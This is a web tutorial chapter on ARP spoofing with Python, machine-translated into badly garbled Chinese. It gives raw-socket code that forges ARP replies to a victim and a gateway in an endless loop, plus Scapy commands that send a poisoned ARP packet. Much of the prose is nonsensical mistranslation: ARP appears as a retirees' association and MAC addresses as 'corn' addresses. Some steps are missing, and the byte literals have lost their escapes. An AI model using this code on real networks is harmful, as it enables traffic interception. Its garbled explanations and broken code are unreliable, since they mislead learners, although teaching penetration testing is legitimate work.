Python Penetration Testing Tutorial
Selected Reading
- Discussion
- Useful Resources
- Quick Guide
- XSS Web Attack
- SQLi Web Attack
- DoS & DDoS attack
- Client-side Validation
- Application Layer
- Pentesting of Wireless Network
- ARP Spoofing
- Network Packet Sniffing
- Python Network Scanner
- The Socket and its Methods
- Primer on Network Communication
- Assessment Methodology
- Introduction
- Python Penetration Testing - Home
Selected Reading
- Who is Who
- Computer Glossary
- HR Interview Questions
- Effective Resume Writing
- Questions and Answers
- UPSC IAS Exams Notes
ARP Spoofing
Python Penetration Testing - ARP Spoofing
债务人可被界定为无国籍状态议定书,用于测绘有形机器地址的因特网协议地址。
Working of ARP
在本节中,我们将了解退休人员协会的工作。 考虑以下步骤,以了解退休人员协会是如何运作的:
Step 1——首先,当机器想要与他人沟通时,它必须看上去ARP的实物地址表。
Step 4——现在,网络上的所有机器都将将广播的IP地址与MAC的地址相比较,如果网络的任何机器识别地址,它将对ARP-request及其IP和MAC地址作出回应。 这种ARP信息被称作ARP_reply。
What is ARP Spoofing?
在恶意行为者向当地地区网络发出伪造的ARP申请时,可以将其界定为一种攻击。 ARP Poisoning也称为ARP Spoofing。 可在以下各点的帮助下理解这一点:
首先,ARP在超负荷工作时,将建造大量伪造的ARP申请和答复包裹。
然后,转换方式将形成。
现在,ARP的表格将用ARP的反响淹没,以便袭击者能够传播所有网络包裹。
Implementation using Python
在本节中,我们将理解ARP的偷猎行为。 为此,我们需要三个排雷中心地址,首先是受害者,其次是袭击者,还有三分之一关口。 与此同时,我们也需要使用《美国退休人员协会议定书》守则。
让我们进口以下所需模块:
import socket import struct import binascii
现在,我们将编制一份清单,其中将有三个参数。 第1项参数告诉我们有关包装接口(PF_PACKET,具体针对六氯环己烷,AF_INET用于窗户),第2项参数告诉我们,如果它是一件原始材料,第3项参数告诉我们我们我们我们我们我们我们我们我们我们感兴趣的议定书(在IP协议中使用0x0800)。
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0",socket.htons(0x0800)))
我们现在将提供攻击者、受害者和网关机器的玉米地址——
attckrmac = x00x0cx29x4fx8ex76 victimmac = x00x0Cx29x2Ex84x5A gatewaymac = x00x50x56xC0x00x28
我们需要如所显示的那样,给予ARP议定书守则——
code = x08x06
两套蚊帐包,一台用于受害者机器,另一套用于网关机:
ethernet1 = victimmac + attckmac + code ethernet2 = gatewaymac + attckmac + code
下面的法典系按照ARP负责人的顺序排列。
htype = x00x01 protype = x08x00 hsize = x06 psize = x04 opcode = x00x02
现在,我们需要给门道机器和受害人机器的IP地址(让我们假定我们遵循国际网关和受害人机器的地址)——
gateway_ip = 192.168.43.85 victim_ip = 192.168.43.131
在socket.inet_aton()方法的帮助下,将上述IP地址转换为hexa格式。
gatewayip = socket.inet_aton ( gateway_ip ) victimip = socket.inet_aton ( victim_ip )
选择以下代码行,以改变门槛机器的IP地址。
victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip while 1: s.send(victim_ARP) s.send(gateway_ARP)
Implementation using Scapy on Kap Linux
能够使用Scapy在Kaplav。 遵循这些步骤——
Step 1: Address of attacker machine
在这一步骤中,我们将通过指挥ifconfig而找到攻击机器的IP地址。
Step 2: Address of target machine
在这一步骤中,我们将找到目标机器的IP地址,操作关于Kapanov的指挥线的config,我们需要在另一个虚拟机器上开放。
Step 3: Ping the target machine
在这一步骤中,我们需要在以下指挥的帮助下,从攻击机器中拿出目标机器:
Ping –c 192.168.43.85(say IP address of target machine)
Step 4: ARP cache on target machine
我们已经知道,两台机器在第三步之后使用ARP包交换MAC的地址,我们可以在目标机器上操作以下指挥器,看ARP的海滩。
arp -n
Step 5: Creation of ARP packet using Scapy
在Scapy的帮助下,我们可以创建ARP包裹如下:
scapy arp_packt = ARP() arp_packt.display()
Step 6: Sending of mapcious ARP packet using Scapy
在Scapy的帮助下,我们可以寄送恶意的ARP包裹如下:
arp_packt.pdst = “192.168.43.85”(say IP address of target machine) arp_packt.hwsrc = “11:11:11:11:11:11” arp_packt.psrc = ”1.1.1.1” arp_packt.hwdst = “ff:ff:ff:ff:ff:ff” send(arp_packt)
现在,如果我们将再次检查目标机器上的ARP切身,那么我们将看到“1.1.1.1”的假地址。
Advertisements